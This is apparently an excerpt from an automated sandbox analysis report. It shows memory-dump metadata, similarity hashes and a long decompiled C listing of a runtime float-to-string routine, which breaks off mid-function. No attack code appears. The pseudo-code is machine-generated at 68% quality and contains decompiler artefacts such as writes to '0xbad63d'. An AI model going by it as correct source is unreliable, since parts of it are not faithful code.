          0x00000000
          0x00000000
          0x001f374b
          0x001f3751
          0x001f3751
          0x001f375d
          0x001f3762
          0x001f3777
          0x001f377d
          0x001f378c
          0x001f3791
          0x001f379c
          0x001f379e
          0x001f37a0
          0x001f37a0
          0x001f37ad
          0x001f37b2
          0x001f37c0
          0x001f37c5
          0x001f37c8
          0x001f37c9
          0x001f37ca
          0x001f37cf
          0x001f37d4
          0x001f37d7
          0x001f37e1
          0x001f37e1
          0x001f37e6
          0x001f37e9
          0x001f37ec
          0x001f37fe
          0x001f3804
          0x001f380b
          0x001f380d
          0x001f380f
          0x001f380f
          0x00000000
          0x001f37ee
          0x001f37f1
          0x001f37f6
          0x001f37f9
          0x001f37fc
          0x001f3816
          0x001f3816
          0x001f381a
          0x001f3827
          0x001f3827
          0x00000000
          0x001f381a
          0x00000000
          0x001f37fc
          0x001f37ec
          0x001f3744
          0x001f362e
          0x001f3630
          0x00000000
          0x00000000
          0x00000000
          0x001f3630
          0x001f362a
          0x001f343b
          0x001f343e
          0x001f347f
          0x001f348c
          0x001f3491
          0x001f3496
          0x001f3498
          0x001f34cf
          0x001f34da
          0x001f34dd
          0x001f34e3
          0x001f34e6
          0x001f34fc
          0x001f3501
          0x001f3508
          0x001f3516
          0x001f3524
          0x001f352d
          0x001f3539
          0x001f3541
          0x001f3546
          0x001f3555
          0x001f355f
          0x001f3561
          0x001f3561
          0x001f3563
          0x001f3563
          0x001f3569
          0x00000000
          0x001f3569
          0x001f34e8
          0x001f34e9
          0x001f34a0
          0x001f34a3
          0x001f34a5
          0x001f34a6
          0x001f34b8
          0x00000000
          0x001f34b8
          0x001f349a
          0x001f349b
          0x00000000
          0x001f349b
          0x001f3440
          0x001f3443
          0x001f344a
          0x001f3457
          0x001f3463
          0x001f346b
          0x001f3472
          0x001f3472
          0x00000000
          0x001f3443
          0x001f33a1
          0x001f33a3
          0x001f33a6
          0x001f33a8
          0x001f33ab
          0x001f33ad
          0x00000000
          0x00000000
          0x001f33af
          0x00000000
          0x00000000
          0x001f33b5
          0x001f33bb
          0x00000000
          0x00000000
          0x00000000
          0x001f33bb
          0x001f3352
          0x001f335e
          0x001f3365
          0x001f336a
          0x001f336e
          0x00000000
          0x001f3370
          0x001f3377
          0x001f337c
          0x00000000
          0x001f337c
          0x001f336e
          0x001f328b
          0x001f328d
          0x00000000
          0x001f328d
          0x001f313e
          0x001f3141
          0x001f3143
          0x001f3149
          0x00000000
          0x001f315d
          0x001f3162
          0x001f3164
          0x001f3167
          0x001f3171
          0x00000000
          0x00000000
          0x001f3184
          0x001f3193
          0x001f3193
          0x001f3197
          0x001f3199
          0x001f31b5
          0x001f31c1
          0x001f31cd
          0x001f31d9
          0x001f3255
          0x001f3255
          0x00000000
          0x001f31db
          0x001f31db
          0x001f31e1
          0x001f31e8
          0x001f31ed
          0x001f31f2
          0x00000000
          0x00000000
          0x001f31f4
          0x001f31f8
          0x001f31fb
          0x001f31fc
          0x001f31fd
          0x001f325a
          0x001f325c
          0x001f3268
          0x001f326f
          0x00000000
          0x001f326f
          0x001f31ff
          0x001f3201
          0x001f3212
          0x001f3219
          0x001f3241
          0x001f324d
          0x001f3253
          0x00000000
          0x00000000
          0x00000000
          0x001f3253
          0x00000000
          0x001f31e1
          0x001f31d9
          0x001f3186
          0x001f318b
          0x001f3191
          0x00000000
          0x00000000
          0x00000000
          0x001f3191

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog_memcmp
          • String ID: CMT$h%u$hc%u
          • API String ID: 3004599000-3282847064
          • Opcode ID: 885904fe8f611a1efe69967dbac9fd1e9874720cf28055eced20884e4b101c79
          • Instruction ID: 0532ac45716c7b41ac15df95d514a5763e9e4ea1b1c56f536d32707657f1a327
          • Opcode Fuzzy Hash: 885904fe8f611a1efe69967dbac9fd1e9874720cf28055eced20884e4b101c79
          • Instruction Fuzzy Hash: C132D17151038C9FDF18DF74C885AFA37A5AF64300F044579FE5A8B286DB74AA49CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021C55E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 68%
          			E0021C55E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				void* _t1142;
				signed int _t1143;
				signed int _t1146;
				char _t1151;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				unsigned int _t1170;
				void* _t1174;
				void* _t1175;
				unsigned int _t1176;
				signed int _t1181;
				signed int _t1182;
				signed int _t1184;
				signed int _t1185;
				intOrPtr* _t1187;
				signed int _t1188;
				signed int _t1190;
				signed int _t1191;
				signed int _t1194;
				signed int _t1196;
				signed int _t1197;
				void* _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				void* _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int* _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				intOrPtr* _t1218;
				intOrPtr* _t1219;
				signed int _t1221;
				signed int _t1223;
				signed int _t1226;
				signed int _t1232;
				signed int _t1236;
				signed int _t1237;
				signed int _t1242;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1270;
				signed int _t1273;
				signed int _t1275;
				signed int* _t1276;
				signed int* _t1279;
				signed int _t1288;

				_t1142 = __edx;
				_t1273 = _t1275;
				_t1276 = _t1275 - 0x964;
				_t743 =  *0x22d668; // 0x4319796a
				_v8 = _t743 ^ _t1273;
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1187 = _a16;
				_v1924 = _t1187;
				_v1920 = _t1055;
				E0021C078( &_v1944, __eflags);
				_t1236 = _a8;
				_t748 = 0x2d;
				if((_t1236 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1187 = _t748;
				 *((intOrPtr*)(_t1187 + 8)) = _t1055;
				_t1188 = _a4;
				if((_t1236 & 0x7ff00000) != 0) {
					L5:
					_t753 = E002186BF( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1188;
									_a8 = _t1236 & 0x7fffffff;
									_t1288 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1190 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1190 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1191 = _t1190 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1242 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1242;
									E0021E0C0(_t1078, _t1288);
									_push(_t1078);
									_push(_t1078);
									 *_t1276 = _t1288;
									_t790 = E00220F10(E0021E1D0(_t1191, _t1242), _t1288);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1191;
									_v464 = _t1191;
									_t1061 = (0 | _t1191 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1242;
									if(_t1242 < 0) {
										__eflags = _t1242 - 0xfffffc02;
										if(_t1242 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E0021AA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1260 = _t1109;
														_t1218 =  &_v468 + _t1109 * 4;
														_v1880 = _t1218;
														while(1) {
															__eflags = _t1260 - _t1061;
															if(_t1260 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1218;
															}
															_t210 = _t1260 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1170 = 0;
																__eflags = 0;
															} else {
																_t1170 =  *(_t1218 - 4);
															}
															_t1218 = _t1218 - 4;
															_t972 = _v1880;
															_t1260 = _t1260 - 1;
															 *_t972 = _t1170 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1260 - 0xffffffff;
															if(_t1260 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1242 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1194 = 1 - _t1242;
											E0020E920(_t1194,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1273 + 0xbad63d) = 1 << (_t1194 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1174 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1273 + _t1174 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0))) {
														goto L101;
													}
													_t1174 = _t1174 + 4;
													__eflags = _t1174 - 8;
													if(_t1174 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1175 = 0;
															__eflags = 0;
														} else {
															_t1175 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1261 = _t1110;
														__eflags = _t975 - _t1175 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1219 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1175 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1261 - _t1061;
															if(_t1261 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1219;
															}
															_t175 = _t1261 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1176 = 0;
																__eflags = 0;
															} else {
																_t1176 =  *(_t1219 - 4);
															}
															_t1219 = _t1219 - 4;
															_t981 = _v1880;
															_t1261 = _t1261 - 1;
															 *_t981 = _t1176 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1261 - 0xffffffff;
															if(_t1261 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1221 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1263 = _t1221 << 2;
														E0020E920(_t1221,  &_v1396, 0, _t1263);
														 *(_t1273 + _t1263 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1221 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E0021AA64( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1279 =  &(_t1276[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1264 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1264;
										__eflags = _t1061 - _t1264;
										if(_t1061 != _t1264) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1223 = _t992 >> 5;
											_v1872 = _t1223;
											_v1908 = _t1114 - _t993;
											_t996 = E0020DDA0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1181 = _t1061 + _t1223;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1181;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1181 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1181 - 0x00000073 > 0x00000000;
											__eflags = _t1181 - 0x73;
											if(_t1181 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E0021AA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1181 - _t1119;
													if(_t1181 >= _t1119) {
														_t1181 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1181;
													_v1880 = _t1012;
													__eflags = _t1181 - 0xffffffff;
													if(_t1181 != 0xffffffff) {
														_t1182 = _v1872;
														_t1266 = _t1181 - _t1182;
														__eflags = _t1266;
														_t1123 =  &_v468 + _t1266 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1182;
															if(_t1012 < _t1182) {
																break;
															}
															__eflags = _t1266 - _t1061;
															if(_t1266 >= _t1061) {
																_t1226 = 0;
																__eflags = 0;
															} else {
																_t1226 =  *_t1123;
															}
															__eflags = _t1266 - 1 - _t1061;
															if(_t1266 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1273 + _t1020 * 4 - 0x1d0) = (_t1226 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1266 = _t1266 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1181 = _v1892;
														_t1223 = _v1872;
														_t1264 = 2;
													}
													__eflags = _t1223;
													if(_t1223 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1223 << 2);
														_t1276 =  &(_t1276[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1181;
													} else {
														_v472 = _t1181 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1264;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1273 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1273 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1268 = _t1023 >> 5;
													_v1876 = _t1268;
													_v1908 = _t1129;
													_t1027 = E0020DDA0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1184 = _t1268 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1184;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1184 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
													__eflags = _t1184 - 0x73;
													if(_t1184 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E0021AA64( &_v468, 0x1cc,  &_v1396, 0);
														_t1276 =  &(_t1276[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1184 - _t1134;
															if(_t1184 >= _t1134) {
																_t1184 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1184;
															_v1892 = _t1135;
															__eflags = _t1184 - 0xffffffff;
															if(_t1184 != 0xffffffff) {
																_t1185 = _v1876;
																_t1270 = _t1184 - _t1185;
																__eflags = _t1270;
																_t1043 =  &_v468 + _t1270 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1185;
																	if(_t1135 < _t1185) {
																		break;
																	}
																	__eflags = _t1270 - _t1061;
																	if(_t1270 >= _t1061) {
																		_t1232 = 0;
																		__eflags = 0;
																	} else {
																		_t1232 =  *_t1043;
																	}
																	__eflags = _t1270 - 1 - _t1061;
																	if(_t1270 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1273 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1232 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1270 = _t1270 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1184 = _v1880;
																_t1268 = _v1876;
															}
															__eflags = _t1268;
															if(_t1268 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1268 << 2);
																_t1276 =  &(_t1276[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1184;
															} else {
																_v472 = _t1184 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E0021AA64();
										_t1279 =  &(_t1276[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0x226a9c + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1201 = 0;
															_t1250 = 0;
															__eflags = 0;
															do {
																_t1155 = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) >> 0x20;
																 *(_t1273 + _t1250 * 4 - 0x1d0) = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) + _t1201;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1250 = _t1250 + 1;
																_t1201 = _t1155;
																__eflags = _t1250 - _t1096;
															} while (_t1250 != _t1096);
															__eflags = _t1201;
															if(_t1201 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1273 + _t856 * 4 - 0x1d0) = _t1201;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0x226a06 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0x226a06 + _t812 * 4) & 0x000000ff) + ( *(0x226a07 + _t812 * 4) & 0x000000ff);
												E0020E920(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E0020EA80( &(( &_v1396)[_t1097]), 0x226100 + ( *(0x226a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x226a07 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1204 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1156 =  &_v468;
														} else {
															_t1204 =  &_v468;
															_t1156 =  &_v1396;
														}
														_v1908 = _t1156;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1157 = 0;
														_t1252 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1157;
															_t870 = _t1157 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1205 = _t1204 -  &_v1860;
															__eflags = _t1205;
															_v1928 = _t1205;
															do {
																_t878 =  *(_t1273 + _t1205 + _t1252 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1206 = 0;
																	_t1099 = _t1252;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1205 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1157;
																			if(_t1099 == _t1157) {
